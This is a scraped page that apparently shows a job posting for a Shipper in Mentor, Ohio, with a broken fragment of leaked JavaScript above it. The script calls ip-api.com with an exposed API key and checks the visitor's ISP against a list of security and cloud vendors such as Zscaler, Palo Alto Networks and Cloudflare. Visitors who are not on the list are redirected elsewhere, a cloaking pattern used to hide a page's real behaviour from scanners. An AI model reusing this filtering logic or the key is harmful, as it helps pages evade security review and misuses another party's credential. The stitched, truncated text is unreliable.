Shipper
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable and detail-oriented Shipper to join our team in Mentor, Ohio. In this role, you will be responsible for accurately preparing, packing, and labeling outbound shipments to ensure timely delivery.
Responsibilities include:
- Receiving and processing incoming orders and shipments
- Picking, packing, and labeling products according to specifications
- Operating shipping and packaging equipment safely and efficiently
- Maintaining accurate shipping records and documentation
- Ensuring inventory is organized and stock is properly stored
- Adhering to safety procedures and quality standards
Skills needed:
- Strong attention to detail and accuracy
- Good organizational and time management skills
- Ability to work independently and as part of a team
- Basic computer skills for data entry and record keeping
- Physical stamina to lift and move packages
Benefits include:
- Competitive pay
- Health and dental insurance options
- Paid time off and holidays
- Growth opportunities within the company
- Friendly and supportive work environment